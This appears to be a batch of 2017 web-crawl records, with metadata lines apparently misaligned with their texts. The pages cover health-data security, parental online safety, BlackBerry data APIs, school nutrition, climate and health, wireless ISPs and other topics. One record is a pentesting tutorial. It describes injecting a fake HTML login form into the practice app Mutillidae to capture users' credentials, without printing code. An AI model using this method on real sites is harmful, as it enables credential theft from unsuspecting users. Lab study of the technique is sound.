CC-MAIN-2017-09
http://www.fs.com/blog/several-common-types-of-fiber-optic-cables-and-patch-cables.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00061-ip-10-171-10-108.ec2.internal.warc.gz
en
0.934755
647
3.109375
3
The U.S. Department of Health and Human Services today released several online tools to help health-care providers use mobile devices such as smartphones, tablet computers and laptops without risking breaches of patient health information. The tools are part of an HHS education initiative to help providers and other health-care organizations better secure protected health information on mobile devices. The multipronged initiative also includes a variety of videos, fact sheets, FAQs and posters. In a recent Ponemon Institute survey on patient privacy and data security, 94 percent of health-care organizations reported a data breach in the past two years. The most common security breach was the loss of equipment, primarily mobile devices, reported by 46 percent of respondents. Larry Ponemon, chairman of the institute, based in Portland, Ore., said many of the breaches can be traced to the use of cloud computing services and the rapid growth of workers using their own mobile devices in the workplace. “Many organizations admit they are not confident they can make certain these devices are secure and that patient data in the cloud is properly protected,” Ponemon said in a statement. “Overall, most organizations surveyed say they have insufficient resources to prevent and detect data breaches." The HHS education initiative grew out of a Mobile Device Roundtable held in March. The mobile device security initiative was formally launched today at the annual meeting of the Office of the National Coordinator for Health IT, a division of HHS.
<urn:uuid:4ded5083-153d-40ee-8e56-be4c1d1c3097>
CC-MAIN-2017-09
http://www.nextgov.com/health/health-it/2012/12/new-tools-secure-mobile-health-data/60124/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00061-ip-10-171-10-108.ec2.internal.warc.gz
en
0.948532
293
2.515625
3
Most of the talk about big data in government has been about crunching through existing data pools to spot trends that older tools weren’t powerful enough to identify. Computer scientists are crawling the full database of Medicare claims, for example, to spot common fraud patterns before those claims are paid out. IBM’s Smarter Cities project is analyzing existing data from traffic sensors to build plans to ease congestion and reduce pollution. The potential insights offered by deeper computer analysis have also prompted some agencies to begin new data gathering projects, though. Witness this special notice from the Centers for Disease Control and Prevention seeking a data coordinating center for information related to sudden death in people under 24 years old. According to the notice: Sudden death in the young (SDY) is a tragedy that affects children and young adults of all ages, making it a critical public health concern. Development of effective screening and prevention strategies is currently limited by the lack of prospectively defined epidemiological data, including incidence rates of specific causes of death (e.g., sudden cardiac death, sudden unexplained death in epilepsy). To address this knowledge gap, the CDC and the National Institutes of Health (NIH) are developing a program to explore and provide greater understanding of SDY by developing a surveillance system and registry that will broaden and enhance the activities of CDC's Sudden Unexpected Infant Death (SUID) Case Registry. We expect many of the infant SDY cases to be a subset of the SUID cases. The National Institutes for Health is cosponsoring the project.
<urn:uuid:9f019e14-16d8-4962-90e9-03e94f2e88a9>
CC-MAIN-2017-09
http://www.nextgov.com/emerging-tech/emerging-tech-blog/2012/11/cdc-plans-gather-new-data-about-sudden-death-young/59458/?oref=ng-voicestop
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171078.90/warc/CC-MAIN-20170219104611-00589-ip-10-171-10-108.ec2.internal.warc.gz
en
0.920476
314
2.890625
3
Encourages Parents to Model Good Device and Online Safety Behavior in 2012 SANTA CLARA, Calif. January 4, 2012 — With more devices in everyone’s hands after the holidays, children are sure to take their cues from parents and older siblings. Ultimately children will become frequent users of online devices — playing games, watching videos, texting, listening to music, web surfing, etc. — just like their other family members — and they’ll imitate the behaviors they see at home. McAfee, provider of the award-winning web filtering McAfee® Safe Eyes® software, suggests that, this year, parents take time to teach healthy online habits. “What child doesn’t want to be just like Mom, Dad or an older sibling? Kids today see Mom spending lots of time on social networking sites, Dad taking calls or checks email during the dinner hour and older siblings texting friends and listening to music on their cell phones while doing homework,” says Stanley Holditch, online family safety advocate at McAfee. “Now is the time for parents to model good behavior and etiquette.” McAfee recommends parents start the New Year off fresh with resolutions that address their own behavior so they can model best practices for kids and teens: 1. When I’m with my children, I pledge not to spend more than 10 percent of the time on my phone or computer. Adults spend about 3.5 hours a day perusing the Internet or staring at their cell phone, according to estimates from eMarketer.1 This year, make a promise to give your full attention to your children and develop a plan to limit their use of electronic devices. For example, make rules against using cell phones during dinner and set a time that everyone turns their devices off. A Kaiser Family Foundation study1 found that eight to 18-year-olds average over 7.5 hours per day to using entertainment media including cell phones and computers. Some of that time is spent multitasking, including doing homework. The study also found that only three in ten young people have rules about how much time they can spend watching television, playing video games or using the computer. 2. I will not communicate with my children via text when they are in the house. One downside of technology is that fewer people actually speak to one another. The Kaiser study found that children in grades 7-12 spend an average 1.5 hours a day sending or receiving texts. A recent Nielsen study revealed that, on average, teenagers send more than 3,300 texts each month (girls send about 4,000 texts a month).2 Adults are texting more frequently, too, but haven’t quite caught up with the younger generation. The Pew Research Center found that adults send only about 10 texts per day.3 3. I will not give my child access to an Internet browser on a smartphone or tablet that is not safe for them to use. At age three, about one-quarter of children go online daily, and that number increases to about half by age five. By age eight, more than two-thirds use the Internet on any given weekday.4 In addition, 20 percent of children age 6-11 own cell phones with Internet capabilities, according to reports from Mediamark Research and Intelligence.5 It’s important for parents to shield children from cyber-dangers by filtering explicit content on smartphones and tablets via applications such as Safe Eyes Mobile software. The software can prevent children from establishing or accessing social network accounts, limit Internet use, block inappropriate websites or messenger chats, or use other strategies to ensure youngsters are safe online. 4. I will be prepared to have a "texting intervention" if my teen's thumbs begin to look like tiny body-builders. Texting may be a quick and easy way to interact with others, but the impersonal nature of the communication and frequency of use can cause problems. Too much texting can lead to a variety of issues: poor study and sleeping habits, less face-to-face social interaction, and, for older teens, distracted driving. Discuss appropriate behavior before problems arise and set boundaries. Most mobile device providers have ways to monitor and limit the number of text and picture messages youngsters can send and receive. 5. I will have “the” talk with my kids. Not “that” talk, but rather the one that discusses who they are connecting with and what they are doing online. Children often lack an understanding of online dangers or they may lack the maturity to make appropriate decisions. A recent survey found that 96 percent of parents have offered guidance to their children about online behavior and the risks and benefits of being on the Internet.6 Children learn how to use technology, including how much and when, by watching their parents, so it's important that parents model good behavior. They also look to their parents for guidance and protection when they are online. In addition to education, there are mobile solutions available for parents and kids to help keep them safe, such as McAfee Safe Eyes Mobile software, which provides a filtered browser for iOS devices, as well as McAfee Family Protection for Android. By modeling good behavior and ensuring that children’s experiences on Internet-connected devices is a safe and healthy one, parents can ensure a 2012 that is free of digital drama. 1eMarketer Digital Intelligence, Time Spent Watching TV Still Tops Internet, December 2010 2Kaiser Family Foundation, Generation M2: Media in the Lives of 8- to 18-Year-Olds, January 2010 3Nielsen, U.S. Teen Mobile Report: Calling Yesterday, Texting Today, Using Apps Tomorrow, October 2010 4Pew Research Center, Cell Phones and American Adults: They Make Just as Many Calls, but Text Less Often than Teens, September 2010 4Joan Ganz Cooney Center, Always Connected: The New Digital Media Habits of Young Children, March 2011 5Mediamark Research and Intelligence, American Kids Study, 2009 6Family Online Safety Institute/Hart Research, Who Needs Parental Controls: A Survey of Awareness, Attitudes, and Use of Online Parental Controls, September 2011 McAfee, a wholly owned subsidiary of Intel Corporation (NASDAQ:INTC), is the world's largest dedicated security technology company. McAfee delivers proactive and proven solutions and services that help secure systems, networks, and mobile devices around the world, allowing users to safely connect to the Internet, browse and shop the Web more securely. Backed by its unrivaled Global Threat Intelligence, McAfee creates innovative products that empower home users, businesses, the public sector and service providers by enabling them to prove compliance with regulations, protect data, prevent disruptions, identify vulnerabilities, and continuously monitor and improve their security. McAfee is relentlessly focused on constantly finding new ways to keep our customers safe. http://www.mcafee.com NOTE: McAfee and Safe Eyes are registered trademarks or trademarks of McAfee or its subsidiaries in the United States and other countries. Other names and brands may be claimed as the property of others.
<urn:uuid:366241ce-007d-4606-9fcb-f1e9b1a507b8>
CC-MAIN-2017-09
https://www.mcafee.com/mx/about/news/2012/q1/20120104-01.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171463.89/warc/CC-MAIN-20170219104611-00113-ip-10-171-10-108.ec2.internal.warc.gz
en
0.938986
1,461
3.046875
3
HTML Injection is a vulnerability which occurs in web applications that allows users to insert html code via a specific parameter for example or an entry point. This type of attack can be used in combination with some sort of social engineering in order to trick valid users of the application to open malicious websites or to insert their credentials in a fake login form that it will redirect the users to a page that captures cookies and credentials. In this tutorial we are going to see how we can exploit this vulnerability effectively once it is discovered. For the needs of the article the Mutillidae will be used as the vulnerable application. Let’s say we have a page like the following: Of course in this example there is an indication that this form is accepting HTML tags as it is part of the functionality of the application. A malicious attacker will think that he can exploit the users of this application if he set up a page that is capturing their cookies and credentials in his server. If he has this page then he can trick the users to enter their credentials by injecting into the vulnerable page a fake HTML login form. Mutillidae has already a data captured page so we are going to use this page for our tutorial. Now we can inject HTML code that it will cause the application to load a fake login form. The next image is showing the fake login form: Every user that will enter his credentials it will redirected to another page where his credentials will stored. In this case the credentials can be found at the data capture page and we can see them below: As we saw in this article HTML injection vulnerabilities are very easy to exploit and can have large impact as any user of the web application can be a target. System admins must take appropriate measures for their web applications in order to prevent these type of attacks.
<urn:uuid:19765df2-889b-4145-a0e5-2441d4d3d960>
CC-MAIN-2017-09
https://pentestlab.blog/tag/mutillidae/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173761.96/warc/CC-MAIN-20170219104613-00641-ip-10-171-10-108.ec2.internal.warc.gz
en
0.935761
363
3.65625
4
Many apps that you create will need to manipulate data in some way. A contacts list app might need to load existing contacts from a data file and save new contacts in the file. A sports app might track team statistics in a data file and update these statistics after each game. The BlackBerry 10 Native SDK supports a wide range of libraries that you can use to manipulate data, like SQLite, JSON_parser, and libxml2. Cascades also provides its own set of data management APIs to help remove some of the complexity of storing and modeling data. Additionally, Cascades provides its own set of APIs that you can use to parse and store JSON data. For SQL data, the SQLite library provides a serverless, transactional SQL database engine that you can include in your apps. To remove some of the complexity of creating a SQLite database, you can use the Cascades APIs. To learn more about using SQL in Cascades, see SQL data. As with the other types of data mentioned above, Cascades provides its own set of APIs to make managing the data type easier. For more information about managing XML data with Cascades, see XML data File system access Before you can store or retrieve data from the device, you should first make yourself familiar with the architecture of the device file system. Applications have access to their own working directories as well as a shared directory that all apps can access. For more information about the file system, see File system access. Cascades data management APIs The Cascades framework uses a modular approach to store, access, and display data in your apps. This approach makes it easy for you to store different types of data, organize and model the data in different ways, and display the data with different visual styles. The following diagram illustrates the different components that interact when you manipulate data in your app: This component represents the raw data for your app. The data could be a list of contact entries, a set of financial records, or a group of game objects. You can access data that you package with your app, but you can also create new data dynamically as your app runs. The format of this data can vary depending on your needs, and Cascades provides classes that help you manage three common data formats: JSON, SQL, and XML. This component lets you access the external data and manipulate it in your app. You can load data files, create new files and save data in them, and handle any errors that might occur during these operations. Then, you can add the data to a data model to organize it before it's displayed. You can use the JsonDataAccess, SqlDataAccess, and XmlDataAccess classes to load and save data in JSON, SQL, and XML format, respectively. You can also access SQL data asynchronously using an SqlConnection. Supporting classes, such as DataAccessError, give you more information about errors so you can handle them appropriately. This component is designed specifically as an easy-to-use adapter in QML between external data and UI components. You can use the DataSource class to declare the properties of the external data that you want to access. This data can be SQL, JSON, or XML data that's stored locally, or it can be JSON or XML data feeds that are accessed remotely. You can also use the DataSource class to control when and where the data is loaded. This component lets you organize and sort your data, and then provide the data to a list view to display it. For example, you can use a GroupDataModel to sort a list of employees by last name or employee number. Then, you can associate this data model with a list view, and your data is organized and displayed in the way you specified. To learn more about data models, see Data models . This component determines how the data from the data model is most often displayed in your app. Each entry in the data model becomes an item in the list, and you can specify how each item should appear visually. You might represent each item using a simple Label, or you might represent each item using multiple controls that you define yourself. A ListView lets you handle all visual aspects of the list, and is separate from the data and the data model that's used to provide the data to display. To learn more about list views, see Lists. Large data sets If you're using a ListView to display information from a data source, you must consider how the performance of your app is affected by the amount of data. Small amounts of data can be loaded as a complete set during initialization with little to no performance impact. Large sets of data must be managed differently to avoid start-up delays, slow scrolling, and other indicators of poor performance. For more information about managing large amounts of data, see Large data sets. Persistent data allows you to save app settings to the persistent store and load them when they are needed. The persistent store lets you save objects to persistent memory, and these objects are retained in memory after a device is restarted. For more information about the persistent store, see Persistent data. Last modified: 2015-07-24
<urn:uuid:b5730774-8316-44eb-bbf8-399a512c2680>
CC-MAIN-2017-09
http://developer.blackberry.com/native/documentation/device_platform/data_access/index.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170914.10/warc/CC-MAIN-20170219104610-00109-ip-10-171-10-108.ec2.internal.warc.gz
en
0.887072
1,068
2.59375
3
Teaching Smart Social Networking You’ve got a 10-minute break between classes. What do you do? Grab a snack, hit up office hours, maybe log on to Facebook and scan your friends’ profiles for the latest gossip? All are viable options, unless you’re a student at Concordia University in Montreal. Since September, Concordia University has banned the use of Facebook on all on-campus terminals, including desktop computers. According to published reports, the ban was implemented after Concordia officials noticed an increase in spam and phishing attacks that technical experts traced to social networking sites, particularly Facebook. “Social networking was a new playground for spammers,” explained David Poellhuber, president of Zerospam, a provider of professional e-mail filtering services. “It offered them a fresh crop of targets — mostly young people, tech-savvy people [who are] perhaps not so security-conscious.” In fact, users who have grown up with computers are prime targets for social networking attacks because they’re inherently hungry for content and used to clicking around online to obtain it, Poellhuber said. “They want to get the features, they want to get the application, and they will click ‘yes,’” he said. “They will click ‘yes’ to Google, which will read their e-mail. They will click ‘yes’ to any Apple store, which will hold their credit card information. They just want to get [the programs] running. The fact is that the digital natives are probably more lax than the analog natives on privacy protection.” Simply posting your e-mail address online opens you up to hacker attacks, Poellhuber said. “Doing that not only is an invitation to spammers, but it also compromises the internal e-mail syntax structure. An educated spammer could, in fact, deduce what your e-mail syntax is [and send spam to] not only you but also your whole company,” he said. Hackers and spammers do need to work harder to obtain personal data via social networking sites, but the payoff is worth the work. “They have to use fake invites, they have to create fake profiles — they even have to use phishing techniques to get the user credentials and then actually take over the compromised accounts,” Poellhuber said. “But in the end, the reward is quite good because, since social networking is based on trust, they might very well have a larger response rate than they have with the traditional techniques.” That means if a hacker spams the entire populations of Facebook and MySpace combined — roughly 170 million people — and achieves one click in 10,000 or even one in 20,000, it’s still a good business. “It’s the law of large numbers,” Poellhuber said. Despite the risks of social networking on campus, however, Poellhuber said restricting access is not the best option. “Blocking social networking sites is the best way to create a riot,” he joked. So what can students and universities do to ensure everyone enjoys a safe social networking experience? “The answer lies far more in education than anything else,” Poellhuber said. “A lot of this has to do with helping the users behave properly.” As a student, you should be aware of the security features available on sites such as Facebook. For example, you can change your privacy settings to limit the visibility of your online profiles to approved members. Additionally, you should try to avoid publishing your e-mail address. Also, keep in mind that the larger your network of virtual “friends,” the greater your risk of being spammed. “How much trust can you put into a 700-people network? As it grows larger, I think the trust goes lower,” Poellhuber said. Poellhuber also recommended students be extra vigilant when logging on to social networking sites “just to make sure they’re on the right site and not a phish site.” Educational institutions should be broadcasting these guidelines as effectively as possible, but the IT community also holds responsibility. – Agatha Gilmore, firstname.lastname@example.org
<urn:uuid:b191c911-427b-4225-9ecc-896854fdd0a7>
CC-MAIN-2017-09
http://certmag.com/teaching-smart-social-networking/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00461-ip-10-171-10-108.ec2.internal.warc.gz
en
0.950737
921
2.765625
3
School Nutrition Standards School meals are healthy meals that are required to meet the Dietary Guidelines for Americans. To receive federal reimbursements, school meal programs must offer “reimbursable” meals that meet strict federal nutrition standards. These standards, also referred to as “the meal pattern,” require schools to offer students the right balance of fruits, vegetables, low-fat or fat-free milk, whole grains and lean protein with every meal.Updated School Meal Standards: The Healthy, Hunger-Free Kids Act of 2010 (HHFKA) required the U.S. Department of Agriculture (USDA) to update these nutrition standards for the first time in 15 years. The new regulations, effective beginning in 2012, require cafeterias to offer more fruit, vegetables and whole grains and limit sodium, calories and unhealthy fat in every school meal. Click here for details on school lunch and breakfast standards. New Snack Standards: To ensure all foods and beverages sold in school during the school day are healthy choices, HHFKA also required USDA to create nutrition standards for foods and beverages sold in competition to reimbursable meals. These “competitive foods” are sold in vending machines, snack bars and a la carte lines. In June 2013, USDA issued the “Smart Snacks in School” interim final rule establishing these standards, which took effect July 1, 2014. Click here for details on the competitive foods rule.
<urn:uuid:cc1e6330-fdc4-40ac-b85f-87a1f0e147cf>
CC-MAIN-2017-09
http://sna.dev.networkats.com/AboutSchoolMeals/SchoolNutritionStandards/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00461-ip-10-171-10-108.ec2.internal.warc.gz
en
0.949191
292
3.890625
4
Climate change is happening, and with that will come more deaths from heat-related illness and disease, according to a report released Tuesday. The report, spearheaded and funded by investor and philanthropist Thomas Steyer, former Treasury Secretary Hank Paulson, and former New York Mayor Michael Bloomberg, examines many of the effects of climate change for business and individuals. "One of the most striking findings in our analysis is that increasing heat and humidity in some parts of the country could lead to outside conditions that are literally unbearable to humans, who must maintain a skin temperature below 95°F in order to effectively cool down and avoid fatal heat stroke," the report's authors wrote. They use a "Humid Heat Stroke Index" that combines heat and humidity levels to measure how close they come to the point where the body is unable to cool its core temperature. So far the nation has never reached that level, "but if we continue on our current climate path, this will change, with residents in the eastern half of the U.S. experiencing 1 such day a year on average by century’s end and nearly 13 such days per year into the next century." Dr. Al Sommer, the dean emeritus of the Bloomberg School of Public Health at Johns Hopkins University in Baltimore, was on the committee that oversaw the development of the report. He says that often overlooked in the current debate about greenhouse gases and climate change is the effect of global warming on individuals and hospitals. "There will be places that are heavily populated that will see four months in a row with 95 degree and over weather. You won’t be able to let your kids play outside," he told KHN. "The average will be miserable. When your sweat can't evaporate, you have no way to moderate core body temperature, and some people will die. That’s why you had 700 deaths in Chicago in a one week period in 1995. We're going to have a lot of those periods." Sommer joined Lisa Gillespie and other Kaiser Health News reporters and editors in Washington to talk about the climate change report. Here is an edited transcript of his remarks. What will the main health issues be as parts of the country get dangerously hot and humid, and others lose coast line and experience drought? The bottom line is that it's going to get more hot and humid in some areas … you've got the South, the East Coast and Atlantic states, and the problem with hot and humid is that you can’t control body temperature, because when it gets hot, you sweat, and when it evaporates, it cools the skin. But when it hits 95 or 102, and the humidity is such that you can't evaporate sweat, it just stays there, there is no way to cool the body temperature. You can bundle up against the cold, you can wrap up more blankets and you buy some down sleeping bags in freezing weather. But in heat, you can take off more clothes, but you’re still stuck at that heat point index. What are the challenges with getting this message out? The challenge is like every challenge in public health. If we're successful, nothing happens. If you say, "Something is going to happen," [the public's] response will be "You know, who knows? I’m worried about my mortgage," and the average CEO is worried about making quarterly profits, so they don't care. Getting people to be concerned about the future is tough. The person who is wealthy and can afford air conditioning doesn't have much to worry about. You'll have the deniers, and you can't talk to them, and then the people who just don't want to worry about it. What challenges will health care systems face? You have to pay attention to something that will dramatically impact the health care system. You have to deal with the poor who live in places that are getting the hottest, and won’t necessarily be able to move up to other places where it’s not so hot. And the health care system is going to have a surge where it’ll have to deal with the problems of excessive heat. But who's going to pay them and who's going to warehouse the 25 percent increase in respirators, pumps, nurses and doctors because 40 years from now something is going to happen? Health care systems would be happy to prepare if someone paid for it. What do you think the health care system can do right now? The health care system as a whole, knowing how much it will cost, can begin to put pressure and engage in climate discussion because [climate change] will end up driving costs. The hospitals have to be prepared, some hospitals may go out of business because there will be places where no one is left alive. Miami? Who’s going to live in Miami? The heat is rising, the water is rising … who’s going to move the [health care] personnel [to another less hot state]? Will North Dakota build bigger hospitals to take up the surge of people who are moving up there? Hospitals need to be able to pick up the slack, and plan for what they will do, and talk to the payers to [be able] to increase their surge capacity. Forty years isn’t far away if you think about a cycle of a hospital. Hopkins just opened two new centers, and it took 25 years. They will have to start now. Are there any benchmarks the health care industry can watch out for to know if there is enough being done to stop or slow climate change so that these health care crisis strategies will not be needed? What would be terrific is if medical CEOs get into a discussion about this. I’m sure they’ve talked about pandemic flu, but I doubt they’ve talked about this. The fact that you can predict the amount of people who will show up in ER with heat stroke, [then] you can start assessing it. You guys and gals who run health care systems know what that will do. What would we really need? That's what this study is about -- to put data on the table at a granular level so people can begin to have informed discussions, which will lead to thoughtful ideas on how you respond and maybe lead to momentum. Kaiser Health News is an editorially independent program of the Henry J. Kaiser Family Foundation, a nonprofit, nonpartisan health policy research and communication organization not affiliated with Kaiser Permanente.
<urn:uuid:fe82f040-4ffc-4c1c-b5e2-9e1546be3fe5>
CC-MAIN-2017-09
http://www.govtech.com/health/health-care-system-need-to-prepare-for-global-warming.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171781.5/warc/CC-MAIN-20170219104611-00637-ip-10-171-10-108.ec2.internal.warc.gz
en
0.966824
1,333
2.71875
3
The Internet connection we all rely on is about to change, now that WISP is coming to town. Most people get Internet service from either a telephone company or a cable company because those providers already provide physical connections to their homes and businesses. A WISP (wireless Internet service provider) doesn't need to bring wire to your location, making it a good solution for serving rural areas where telcos and cable companies couldn't be bothered to invest. WISP was unable to match the speed and reliability of DSL and cable modems, however, until recently. As wireless technology has evolved, WISPs are beginning to compete in urban areas on speed and price. Here's how it works. What makes a WISP A WISP is distinct from other wireless services we currently use. Most cell-phone service providers offer wireless Internet service--with 4G LTE being the fastest current technology--but that doesn't make them WISPs. Cell-phone service providers don't expect you to use their service 24/7, and most place very low caps on the amount of data you can transfer over their networks each month (and charge hefty fees if you exceed that amount). Being able to access the Internet while you're out and about is a distinct advantage, but LTE data rates are relatively slow, and coverage can be spotty--especially away from large metropolitan areas. Satellite TV providers that also provide wireless Internet service, such as Dish Network, are closer to being WISPs. They can deliver wireless Internet service to any home that has a clear view of the southern sky. But the data must travel very long distances, which limits the service's speed, and lag can be a big problem--especially for playing games. A true WISP is a mix of cellular provider and satellite provider elements. Like a cell provider, it mounts antennas on towers (or atop buildings) to transmit signals, and it installs an antenna--or in some cases, a dish--on the customer's home or building. Like a satellite service provider, it typically delivers service to a fixed location. Comparing pricing and features Most WISPs offer tiered service levels, charging higher fees for faster speeds and/or more bandwidth. Like telcos, cable companies, and other ISPs, WISPs typically require you to commit to a one- or two-year contract, and they charge an installation or activation fee. Most WISPs are regional operators that serve limited areas. Netlinx, for instance, serves residential and business customers in southern Pennsylvania. The company's prices for residential service range from $30 to $80 per month. At the low end, you get download speeds of up to 1 mbps, with speed bursts of up to 3 mbps. Upload speeds at this tier are 512 kilobits per second. At the high end, you get download speeds of up to 15 mbps (with bursts up to 30 mbps) and upload speeds of 3 mbps. Many WISPs provide faster upload speeds than the typical 5 to 10 mbps that most cable and DSL providers offer. That can be useful for businesses with remote offices, offsite PC or server backup requirements, or other applications where upload speeds are just as important as download speeds. Like other ISPs, some WISPs limit how much data you can use per month, but these limits tend to be more generous than what cell, satellite, and even some cable providers offer. A few, such as Wisper ISP (serving southern Illinois and eastern Missouri), provide uncapped service. Utah-based Vivint, a newcomer to the WISP market, is offering wireless Internet service at upload and download speeds of 50 mbps for just $55 per month. But the company--best known for its home-security/automation services--has only just begun to roll out its service, which is not widely available outside Utah. Finding a WISP If you think a WISP might be a better option for you than your current ISP is, you can check a number of online directories to find a WISP that provides coverage in your area, including the WISPA Member Directory,A WirelessMapping.com, and Broadband Wireless Exchange. Some WISPs provide a coverage map on their website. Others describe only the general coverage area, and you must call or fill out an online form to get coverage details for a particular address. The time when a WISP was an ISP of last resort--because nothing else was available in a particular area--is coming to an end. As the new class of WISP service spreads, the resulting competition should force telcos and cable companies to step up their game, cut their prices, or both! This story, "Meet WISP, the Wireless Future of Internet Service" was originally published by PCWorld.
<urn:uuid:86888833-b6da-4af2-a137-5252db99b740>
CC-MAIN-2017-09
http://www.cio.com/article/2380547/mobile/meet-wisp--the-wireless-future-of-internet-service.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00281-ip-10-171-10-108.ec2.internal.warc.gz
en
0.951894
999
2.546875
3
Tricking Cancer Cells University of Michigan scientists created the nanotechnology equivalent of a Trojan horse to smuggle a powerful drug inside tumor cells. The scientists use a man-made molecule called a dendrimer, which is small enough to slip through tiny openings in cell membranes. Dendrimers have a treelike structure with many branches where a variety of other molecules, including cancer-fighting drugs, can be attached. Scientists attached a powerful anti-cancer drug to some of the dendrimer's branches, and fluorescent imaging agents and folic acid to other branches. By taking advantage of cancer cells' appetite for folate, a B vitamin, researchers used the folic acid, the synthetic form of folate, as a "treat" to sneak the cancer drug past the cancer cells' membranes. -- University of Michigan Parts of the UK's Critical National Infrastructure were targeted by an ongoing series of e-mail-borne electronic attacks during late spring. Though the majority of observed attacks have been against the central government, other UK organizations, companies and individuals also appear to be at risk. The attackers seem to be covertly gathering and transmitting of commercially or economically valuable information through Trojan programs delivered either in e-mail attachments or through links to a malicious Web site. The e-mails employ social engineering, including a spoofed sender address and information relevant to recipients' jobs or interests, to entice victims to open the documents. Once installed on a machine, Trojans may be used to obtain passwords, scan networks, steal information and launch further attacks. -- National Infrastructure Security Co-ordination Centre In Coral Gables, Fla., drivers can now use cell phones to pay for parking in all on-street and off-street locations operated by the city. This may be the first of such systems in the United States. Drivers opting to use the new pay-by-cellular-phone program must first activate an account by registering a credit card number, license plate number, cellular phone number and e-mail information. A confidential password is provided to each user. When a car is parked on the street or in a lot that offers the wireless payment option, customers call the posted telephone number on the meter from a mobile phone to log in and start the parking session. When customers leave the parking spot, the number must again be called to log out and end the parking session. Customers choose between two parking payment packages -- 25 cents per parking transaction or $7 a month for unlimited parking transactions. This is in addition to the usual applicable parking fees, which are automatically charged to the user's credit card. -- Coral Gables, Fla. Giving Up GIS Governments must release GIS-enabled maps in electronic form to those requesting them under open records laws in Connecticut, the state Supreme Court ruled unanimously in mid-June. Greenwich, Conn., citizen Stephen Whitaker requested electronic access to the city's GIS maps in December 2001 under the state's open records law. Officials refused to give Whitaker access to the city's GIS system, arguing the records qualified for public safety and trade secret exemptions to the state's public records law. Whitaker sued, and the Connecticut Freedom of Information Commission ruled in his favor in 2002. In 2004, the Connecticut Superior Court agreed. Greenwich appealed to the Connecticut Appellate Court, but the Supreme Court stepped in and transferred the case onto its own docket before the intermediate appellate court could rule. -- The Reporters Committee for Freedom of the Press The Intelligent Community Forum (ICF) named Mitaka, Japan, the 2005 Intelligent Community of the Year. The Tokyo suburb has a population of 173,000, and was cited by the ICF for having developed a social and political culture that prizes technology and considers research and development highly important. Mitaka was the first city in Japan to host a field test of fiber-to-the-home networking, served as a test bed for Japan's first ISDN service, and in 1996, Musashin-Mitaka Cable Television became the first ISP in Japan to offer broadband. Among the achievements that led to Mitaka's selection is the founding of the Mitaka Town Management Organization (MTMO). Since its creation, the MTMO's seven facilities have become home to 100 technology businesses. The MTMO also provides business-matching programs and venture investment, as well as other financial services, to encourage business startup and growth. -- Intelligent Community Forum Nearly 100 percent of public libraries offer technology services, according to a report by Florida State University. On the other hand, libraries struggle to upgrade technology regularly, maintain quality Internet connections, provide training and create enough workstations to meet demand, according to the report sponsored by the American Library Association and the Bill & Melinda Gates Foundation. Wi-Fi hotspots can now be found in 100 countries around the world, according to recent data released by JiWire. The United States tops JiWire's list of Wi-Fi friendly countries for having the greatest number of hotspot locations, followed by the United Kingdom, Germany and France. In 2004, Counterpane monitored 523 billion network events worldwide, and the company's analysts investigated 648,000 security "tickets." The company reports that of all hostile security events: A new survey found that 82 percent of broadband users are interested in receiving "triple play" services -- voice, video and high-speed data -- from a single provider. --InsightExpress on behalf of SupportSoft. People considering online education don't see much difference between learning online versus in person, and some educators agree, according to a study of U.S. online education site visitors by Feedback Research. Site visitors said the following attributes of online schools are no different than traditional schools (shown here as a percentage of respondents). The nation's leading e-government Web sites based on customer satisfaction, according to the latest survey by the American Satisfaction Index and Foresee Results, are ranked as follows:
<urn:uuid:5c0b21f8-207b-4955-b50b-a963131892c3>
CC-MAIN-2017-09
http://www.govtech.com/e-government/99428819.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00281-ip-10-171-10-108.ec2.internal.warc.gz
en
0.930777
1,228
2.875
3
Jan. 22 — Scientists around the globe are using Cornell CatchAll software to perform more accurate statistical analyses in fields ranging from microbial ecology to viral metagenomics. Developed by Computer and Information Science professor John Bunge and Cornell Center for Advanced Computing database designers, CatchAll has become the standard package for population diversity analysis. In the January 2014 publication of Microbial Ecology, scientists report using CatchAll in the analysis of soil contaminated with heavy metals, a pervasive problem in the vicinity of mines and industrial facilities in Southern Poland. Little is known about most bacterial species thriving in such soils and even less about a core bacterial community. Marcin Golebiewski and colleagues at Nicolaus Copernicus University used 16S rDNA pyrosequencing and CatchAll to assess the influence of heavy metals on both bacterial diversity and community structure. It was found that Zinc had the biggest impact in decreasing both diversity and species richness. Understanding biodiversity in polluted areas helps scientists to quantify the detrimental effects of human activity on particular taxonomic groups and to monitor bioremediation efforts. In another recent study published in Clinical and Vaccine Immunology, Patricia Diaz and colleagues at The University of Connecticut conducted the first comprehensive evaluation of long-term organ transplant immunosuppression on the oral bacterial microbiome. Many organ transplant patients require lifelong immunosuppression in order to prevent transplant rejection. This study found that prednisone had the most significant effect on bacterial diversity and on the colonization of potentially opportunistic pathogens. The researchers used Catchall to calculate the number of observed operational taxonomic units (OTU) and number of estimated OTUs in order to determine species richness. The latest version of CatchAll was updated in October 2013 and is available for download. In spring 2014 John Bunge, with Cornell Department of Statistical Sciences Ph.D. student Amy Willis, will release a new software package called breakaway. Written in R, breakaway implements a radical new statistical approach to diversity estimation based on a little-known thread in probability distribution theory, which exploits ratios of sample counts. A beta version of breakaway is currently available for testing by contacting the authors. Source: Cornell University Center for Advanced Computing
<urn:uuid:16518cfa-8b2d-4963-9a7a-f0365769590f>
CC-MAIN-2017-09
https://www.hpcwire.com/off-the-wire/scientists-utilizing-cornell-software/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171166.18/warc/CC-MAIN-20170219104611-00633-ip-10-171-10-108.ec2.internal.warc.gz
en
0.908069
443
3.0625
3
